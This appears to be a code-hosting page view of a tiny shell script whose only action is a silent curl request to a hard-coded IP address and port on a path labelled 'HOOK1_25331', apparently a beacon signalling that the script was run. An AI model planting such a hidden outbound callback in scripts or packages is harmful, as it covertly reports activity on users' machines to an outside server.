4 lines
92 B
Bash
4 lines
92 B
Bash
|
|
#!/bin/sh
|
||
|
|
# var a
|
||
|
|
curl -s --max-time 5 'http://202.79.169.91:28016/HOOK1_25331' 2>/dev/null
|